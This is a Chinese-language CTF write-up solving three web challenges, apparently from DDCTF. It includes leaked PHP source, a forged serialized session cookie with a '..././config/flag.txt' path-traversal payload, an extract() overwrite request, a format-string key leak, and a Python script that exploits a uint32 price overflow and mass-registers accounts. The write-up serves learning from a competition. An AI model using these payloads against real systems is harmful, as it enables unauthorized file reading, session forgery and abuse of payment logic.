Web 滴
Web 签到题
Web 大吉大利,今晚吃鸡
1)滴
网址http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09
参数两次base64解码一次ascii解码得到flag.php
观察只有flag.php才显示图片,尝试把index.php按规则编码获取到index的源码
<?php
/*
* https://blog.csdn.net/FengBanLiuYun/article/details/80616607
* Date: July 4,2018
*/
error_reporting(E_ALL || ~E_NOTICE); header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');
$file = hex2bin(base64_decode(base64_decode($_GET['jpg'])));
echo '<title>'.$_GET['jpg'].'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo $file.'</br>';
$file = str_replace("config","!", $file);
echo $file.'</br>';
$txt = base64_encode(file_get_contents($file)); echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
* Can you find the flag file?
*
*/
?>
访问网址,发现出题人的博客,代码注释里日期2018.7.4找到对应日期的博客
猜测存在vim异常退出留下的文件,尝试访问博客中文件名practice.txt.swp
http://117.51.150.246/practice.txt.swp
得到的线索f1ag!ddctf.php
在开始页面编码f1ag!ddctf.php尝试读取,其中根据上面得到的源码 ‘!’ 被过滤,用config代替
得到源码
<?php
include('config.php');
$k = 'hello';
extract($_GET);
if(isset($uid))
{
$content=trim(file_get_contents($k));
if($uid==$content)
{
echo $flag;
}
else
{
echo'hello';
}
}
?>
其中存在extract覆盖漏洞,直接访问http://117.51.150.246/f1ag!ddctf.php?uid=&k=
得到flag
2)WEB签到题
进入之后无法访问,查看网络传输信息,找到post请求网址为Auth.php猜测为验证登录
尝试ddctf_username=admin发包成功进入,提示请访问:app/fL2XID2i0Cdh.php
访问页面查看到app/Application.php和app/Session.php源码
url:app/Application.php
Class Application {
var $path = '';
public function response($data, $errMsg = 'success') {
$ret = ['errMsg' => $errMsg,
'data' => $data];
$ret = json_encode($ret);
header('Content-type: application/json');
echo $ret;
}
public function auth() {
$DIDICTF_ADMIN = 'admin';
if(!empty($_SERVER['HTTP_DIDICTF_USERNAME']) && $_SERVER['HTTP_DIDICTF_USERNAME'] == $DIDICTF_ADMIN) {
$this->response('您当前当前权限为管理员----请访问:app/fL2XID2i0Cdh.php');
return TRUE;
}else{
$this->response('抱歉,您没有登陆权限,请获取权限后访问-----','error');
exit();
}
}
private function sanitizepath($path) {
$path = trim($path);
$path=str_replace('../','',$path);
$path=str_replace('..\\','',$path);
return $path;
}
public function __destruct() {
if(empty($this->path)) {
exit();
}else{
$path = $this->sanitizepath($this->path);
if(strlen($path) !== 18) {
exit();
}
$this->response($data=file_get_contents($path),'Congratulations');
}
exit();
}
}
其中看到Application类中的path参数在魔术方法__destruct()中被调用,并对path进行了一些限制
其中还有危险函数file_get_contents可能用于读取目的文件
猜测可能存在反序列化漏洞
url:app/Session.php include 'Application.php';
class Session extends Application { //key建议为8位字符串
var $eancrykey = '';
var $cookie_expiration = 7200;
var $cookie_name = 'ddctf_id';
var $cookie_path = '';
var $cookie_domain = '';
var $cookie_secure = FALSE;
var $activity = "DiDiCTF"; public function index()
{
if(parent::auth()) {
$this->get_key();
if($this->session_read()) {
$data = 'DiDI Welcome you %s';
$data = sprintf($data,$_SERVER['HTTP_USER_AGENT']);
parent::response($data,'sucess');
}else{
$this->session_create();
$data = 'DiDI Welcome you';
parent::response($data,'sucess');
}
} } private function get_key() {
//eancrykey and flag under the folder
$this->eancrykey = file_get_contents('../config/key.txt');
} public function session_read() {
if(empty($_COOKIE)) {
return FALSE;
} $session = $_COOKIE[$this->cookie_name];
if(!isset($session)) {
parent::response("session not found",'error');
return FALSE;
}
$hash = substr($session,strlen($session)-32);
$session = substr($session,0,strlen($session)-32); if($hash !== md5($this->eancrykey.$session)) {
parent::response("the cookie data not match",'error');
return FALSE;
}
$session = unserialize($session); if(!is_array($session) OR !isset($session['session_id']) OR !isset($session['ip_address']) OR !isset($session['user_agent'])){
return FALSE;
} if(!empty($_POST["nickname"])) {
$arr = array($_POST["nickname"],$this->eancrykey);
$data = "Welcome my friend %s";
foreach ($arr as $k => $v) {
$data = sprintf($data,$v);
}
parent::response($data,"Welcome");
} if($session['ip_address'] != $_SERVER['REMOTE_ADDR']) {
parent::response('the ip addree not match'.'error');
return FALSE;
}
if($session['user_agent'] != $_SERVER['HTTP_USER_AGENT']) {
parent::response('the user agent not match','error');
return FALSE;
}
return TRUE; } private function session_create() {
$sessionid = '';
while(strlen($sessionid) < 32) {
$sessionid .= mt_rand(0,mt_getrandmax());
} $userdata = array(
'session_id' => md5(uniqid($sessionid,TRUE)),
'ip_address' => $_SERVER['REMOTE_ADDR'],
'user_agent' => $_SERVER['HTTP_USER_AGENT'],
'user_data' => '',
); $cookiedata = serialize($userdata);
$cookiedata = $cookiedata.md5($this->eancrykey.$cookiedata);
$expire = $this->cookie_expiration + time();
setcookie(
$this->cookie_name,
$cookiedata,
$expire,
$this->cookie_path,
$this->cookie_domain,
$this->cookie_secure
); }
} $ddctf = new Session();
$ddctf->index();
57行 $session = unserialize($session); 验证了之前的猜想存在反序列化漏洞
那么就是要构造session并调用Application类赋给path值读取flag文件
35行 提示flag所在路径,猜测'../config/flag.txt'
private function get_key() {
//eancrykey and flag under the folder
$this->eancrykey = file_get_contents('../config/key.txt');
}
构造的session会经过一些验证,其中主要构造验证hash值
其验证方式为session[-32:] = md5(eancrykey+session[:-32])
即session的后32位是eancrykey与前面所有字符串拼接后的md5值
接下来就是找eancrykey的具体值,注意到 64行
if(!empty($_POST["nickname"])) {
$arr = array($_POST["nickname"],$this->eancrykey);
$data = "Welcome my friend %s";
foreach ($arr as $k => $v) {
$data = sprintf($data,$v);
}
parent::response($data,"Welcome");
}
熟悉pwn的话容易看出这里存在格式化字符串漏洞
我们令nickname=%s 然后post
成功打印了eancrykey的值:EzBlrbNS
之后开始构造session,urldecode一下原来的session
再经过反序列化之后添加一个Application类,其中path处限制长度18
并且会把../过滤掉,构造'..././config/flag.txt'恰好满足长度
<?php
class Application{
var $path='..././config/flag.txt';
} $a = new Application(); $arr = array (
'session_id' => '063e9d131dd8777edc6e3e6c87dcac56',
'ip_address' => 'x.x.x.x',
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
'user_data' => '',
'payload' => $a,
); $test = serialize($arr);
$eancrykey= 'EzblrbNS';
$hash = md5($eancrykey.$test);
echo $test.$hash;
?>
得到
a:5:{s:10:"session_id";s:32:"063e9d131dd8777edc6e3e6c87dcac56";s:10:"ip_address";s:13:"x.x.x.x";s:10:"user_agent";s:78:"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0";s:9:"user_data";s:0:"";s:7:"payload";O:11:"Application":1:{s:4:"path";s:21:"..././config/flag.txt";}}38b449cd93daf12a3d889a58594ab3d4
经过urlencode提交得到flag
3)大吉大利,今晚吃鸡~
注册登录,显示用户余额100,需要200购买入场卷,直接购买,支付显示余额不足
查看cookie,发现为REVEL_SESSION,推测后台使用golang编写
猜测存在数据溢出,查看go数据类型范围
尝试之后发现为uint32类型,抓包修改金额为4294967296,支付,成功购买
之后需要移除99个对手,注册一个新号同样操作之后填入id与ticket,显示成功移除一名机器人
之后目的就明确了,写脚本注册购买并将id和ticket填入即可
另外,注册页面存在越权漏洞,注册一个帐号,不管是否注册成功都会返回其cookie可用其登录
脚本如下,网上其他师傅的改了一点,学习了
import requests
import time users={} def register(name,pwd='aaaaaaaa'):
url='http://117.51.147.155:5050/ctf/api/register?name=%s&password=%s' %(name,pwd)
requests.adapters.DEFAULT_RETRIES = 5
re=requests.get(url=url)
re.keep_alive = False
cookies=re.cookies.get_dict()
users[cookies['user_name']]=cookies['REVEL_SESSION']
print cookies['user_name'],cookies['REVEL_SESSION']
return cookies['user_name'],cookies['REVEL_SESSION'] def buyticket(name,session):
url='http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4294967296'
header={
'Cookie': 'user_name=%s; REVEL_SESSION=%s' %(name,session)
}
re=requests.get(url=url,headers=header)
bill_id = re.json()['data'][0]['bill_id']
print bill_id
payticket(bill_id,name,session) def payticket(bill_id,name,session):
url='http://117.51.147.155:5050/ctf/api/pay_ticket?bill_id=%s'%(bill_id)
header={
'Cookie': 'user_name=%s; REVEL_SESSION=%s' %(name,session)
}
re=requests.get(url=url,headers=header)
my_id=re.json()["data"][0]["your_id"]
my_ticket=re.json()["data"][0]["your_ticket"]
getflag(my_id,my_ticket) def getflag(id,ticket):
url='http://117.51.147.155:5050/ctf/api/remove_robot?id=%s&ticket=%s' %(id,ticket)
header={
'Cookie': 'user_name=%s; REVEL_SESSION=%s' %(MainUser,MainSession)
}
re=requests.get(url=url,headers=header)
print re.text if __name__=="__main__":
MainUser,MainSession=register('MainUser0002')
buyticket(MainUser,MainSession)
time.sleep(1.1)
for i in range(200,205):
register('AttachUrr%s' %(i))
time.sleep(0.6)
for j in users:
if j!=MainUser:
buyticket(j,users[j])
time.sleep(0.6)